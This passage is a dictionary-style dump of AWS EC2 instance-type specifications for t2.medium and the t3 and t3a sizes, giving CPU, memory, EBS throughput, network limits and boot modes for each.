'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 347, 'BaselineThroughputInMBps': 43.375, 'BaselineIops': 2000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 347, 'BaselineThroughputInMBps': 43.375, 'BaselineIops': 2000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 1024, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 87, 'BaselineThroughputInMBps': 10.875, 'BaselineIops': 500, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.micro', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 1024}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 87, 'BaselineThroughputInMBps': 10.875, 'BaselineIops': 500, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 512, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 43, 'BaselineThroughputInMBps': 5.375, 'BaselineIops': 250, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.nano', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 512}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 43, 'BaselineThroughputInMBps': 5.375, 'BaselineIops': 250, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 174, 'BaselineThroughputInMBps': 21.75, 'BaselineIops': 1000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.small', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 174, 'BaselineThroughputInMBps': 21.75, 'BaselineIops': 1000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 350, 'BaselineThroughputInMBps': 43.75, 'BaselineIops': 2000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.medium', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 4096}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 350, 'BaselineThroughputInMBps': 43.75, 'BaselineIops': 2000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 6, 'Ipv6AddressesPerInterface': 6, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 1024, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 90, 'BaselineThroughputInMBps': 11.25, 'BaselineIops': 500, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.micro', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 1024}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 90, 'BaselineThroughputInMBps': 11.25, 'BaselineIops': 500, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 512, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 45, 'BaselineThroughputInMBps': 5.625, 'BaselineIops': 250, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.nano', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 512}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 45, 'BaselineThroughputInMBps': 5.625, 'BaselineIops': 250, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 2, 'Ipv6AddressesPerInterface': 2, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 2048, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 175, 'BaselineThroughputInMBps': 21.875, 'BaselineIops': 1000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2}], 'Ipv4AddressesPerInterface': 4, 'Ipv6AddressesPerInterface': 4, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.small', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 2048}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 175, 'BaselineThroughputInMBps': 21.875, 'BaselineIops': 1000, 'MaximumBandwidthInMbps': 2085, 'MaximumThroughputInMBps': 260.625, 'MaximumIops': 11800}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 2, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 